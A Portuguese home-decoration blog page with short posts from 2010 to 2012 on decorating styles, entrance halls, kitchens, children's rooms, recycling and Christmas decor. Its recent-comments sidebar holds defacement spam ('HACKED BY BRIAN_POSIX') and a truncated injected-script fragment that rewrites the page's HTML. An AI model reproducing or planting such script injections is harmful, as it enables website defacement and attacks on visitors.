Casa com Vida @ 12:19

Sex, 07/12/12

Saber por onde iniciar a decoração da casa é sempre um dilema…

 

O que fazer primeiro? Escolher o mobiliário? Escolher as primeiro as tintas, ou as almofadas, ou os tapetes?

 

São as dúvidas que assaltam o comum mortal na hora de iniciar a decoração da casa. Na verdade há várias formas de poder organizar uma decoração, diferentes métodos que simplificam a sua execução, uns mais elaborados que outros e muitas teorias já foram escritas e experimentadas nesta área. Para quem pretende iniciar-se e não sabe como fazê-lo, aqui fica um método simples de como Decorar em 7 passos.

 

Não perca nesta segunda-feira às 17:30!

 

Veja o vídeo aqui!




Casa com Vida @ 14:05

Sex, 26/10/12

O Hall de Entrada é a divisão por onde se entra, logo é primordial no que diz respeito à primeira impressão que se terá da casa. É o cartão-de-visita! Logo, não pode ser descurado. Assegure-se que no Hall de Entrada, a cor da tinta, papel de parede, mobiliário, decoração, iluminação e chão são aqueles que passam a mensagem correcta e acolhedora.

 

Conheça as melhores dicas para tornar vivos, os espaços mais improváveis, com Ana Rita Soares...

 

Veja o vídeo aqui!




Casa com Vida @ 17:07

Sex, 28/09/12

O Étnico Chic pode descrever-se como um estilo de vida em que design se cruza com a beleza natural e as especificidades de culturas antigas. Uma fusão única que espelha a nossa própria cultura em evolução, e o nosso fascínio por este mundo também em constante mudança.
Utilização de madeiras toscas ou não (a madeira remete à natureza e dá conforto/aquece visualmente o ambiente), tecidos com padrões étnicos, malha, pelos e peles, cestos de vime, tudo isto misturado, fundindo-se numa decoração contemporânea.
Numa decoração de estilo Étnico chique, pode encontrar-se o inesperado, como a mistura de móveis tailandeses, candeeiros egípcios, esculturas indianas em madeira, convivendo com sofás de estilo italiano, modernos móveis lacados e pormenores em inox. O resultado é um ambiente actual, intimista e elegante.




Casa com Vida @ 19:10

Seg, 11/07/11

Com a crise que teima em vir para ficar o melhor é dar asas à imaginação e recorrer aos meios disponíveis para conseguir ter boas ideias para reciclar e decorar de forma barata mas bastante original.

 

O aproveitamento dos objectos que temos em casa e que já não utilizamos, seja porque estão partidos, desactualizados ou até saturados, é a forma mais eficaz para conseguir uma decoração original, personalizada e, acima de tudo, única! Malas, pneus, livros, discos, lâmpadas, latas…

 

Com criatividade qualquer coisa pode ser transformada e dar um visual muito engraçado à sua casa.




Casa com Vida @ 20:21

Seg, 13/06/11

A Primavera Verão 2011 visa o equilíbrio entre o óbvio e a inovação. Isso implica a utilização de novos materiais contrastantes e cores frescas, direccionados a pessoas de diferentes estilos. A estação exemplifica o verdadeiro conceito de inovação e beleza, num caminho simples, que não é obrigatoriamente “caro”.

 

Os temas principais que ditam as tendências em decoração para 2011 são: redescobrir a natureza, étnico festivo, casual chique, diversão e alegria O vintage continuará a ter um grande destaque na decoração de interiores, assim como os padrões, têxteis e cores de influência global.

 




Casa com Vida @ 19:10

Seg, 16/05/11

Arrumar é, muitas vezes, tirar a bagunça do alcance dos olhos e esconde-la em um armário ou outro lugar qualquer, dando a falsa aparência de ordem.

 

Mais que arrumar, precisamos organizar! Organizar é arrumar as coisas de forma funcional e prática. Deitar fora as coisas que não usamos e guardar as que realmente usamos. Desta forma tudo fica realmente em ordem e não apenas aparentemente.

 

Portanto, casa arrumada não significa casa organizada! Mas... Já uma casa organizada, estará sempre arrumada.

 




Casa com Vida @ 19:04

Seg, 14/03/11

Nesta altura em que nos aproximamos do Verão, surge uma preocupação acrescida com a decoração das nossas casas, sejam a casa que habitamos permanentemente e que querermos vestir para a estação, seja a casa de férias que queremos preparar para a estadia de Verão.

Na rubrica desta semana pretendo abordar aqui alguns estilos que derivam de um mesmo meio envolvente (da vivência fora da área citadina) mas que culminam em tendências realmente diferentes e vincadas (umas mais campestres e umas mais marítimas), que podem facilmente ser adaptados ás casa que nos recebem nesta época do ano. Os estilos Cottage e Country, apresentam características típicas do meio envolvente campestre, embora tenham visuais marcadamente diferentes; Os estilos Tropical e Náutico apresentam características de uma maior proximidade ao mar, com tendências também distintas.

Cada estilo tem uma característica especial, que deixa sua marca em cada espaço de decoração.




Casa com Vida @ 19:04

Seg, 14/02/11

São notórias as diferenças entre a cozinha de antigamente e a cozinha dos dias de hoje. Antigamente a cozinha era reservada apenas às mulheres pois estas apenas se dedicavam à lida da casa mas esta realidade modificou-se muito com o passar dos anos, ou seja, actualmente a cozinha é uma zona aberta a toda gente, quer sejam homens ou mulheres. Aliás, é uma zona em que não só se cozinha e se come, mas também serve muitas vezes para reunir pessoas. Vemos muitas vezes hoje em dia, a cozinha enquanto “sala de cozinhar e comer”. Se observarmos, actualmente, cada vez mais as pessoas deixam de criam salas de jantar para darem lugar às ditas cozinhas espaçosas que vem substituir as salas de jantar. A cozinha já não é uma divisão da casa escondida a convidados pelo contrário é uma divisão cada vez mais espaçosa. Embora possamos encontrar no mercado diversos tipos de cozinha, nem todos os modelos se adaptam ao espaço que temos disponível. Por outro lado, também a colocação dos próprios móveis e electrodomésticos está dependente da planta da divisão.




Casa com Vida @ 19:04

Seg, 17/01/11

Decorar um quarto de criança é à partida um grande desafio, pois para além dos essenciais pontos, como o conforto e a funcionalidade, deve ter-se em atenção também as cores, a iluminação, a organização do espaço, o tipo de mobiliário, a arrumação e ainda, no fim de tudo, conseguir que este espaço se adapte com facilidade às diferentes etapas do crescimento da criança.

Parece complicado, mas seguindo algumas dicas, a tarefa fica facilitada…




Casa com Vida @ 19:03

Seg, 13/12/10

Nesta altura do ano, o espírito Natalício invade as nossas vidas, e como tal, também as nossas casas A decoração de Natal vai mais além que a Árvore de Natal, deve estar presente um pouco por cada recanto da casa. No decorrer dos últimos anos Aadecoração da árvore de Natal tem vindo a adquirir contornos contemporâneos, originais e variados. Porém continua a haver quem prefira manter a tradição, utilizando ano após ano os mesmos objectos de decoração na árvore. Importante mesmo, é que, independentemente dos ornamentos utilizados na árvore, esta resulte alegre, criativa e surpreendente!



Facebook Like

Pub
Rubricas
Comentários recentes
Kd o vídeo?
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa...
HACKED BY BRIAN_POSIXHACKED BY BRIAN_POSIXHACKED B...
Hacked By Brian_posix !!SIC MULHER PWNED BY BPOSIX...
document.documentElement.innerHTML=unescape("Hacke...
Amei <3 mt
https://m.facebook.com/Veredictod1amor/insights/
Acabei de o receber, muito obrigada!
Pesquisar
 
subscrever feeds
blogs SAPO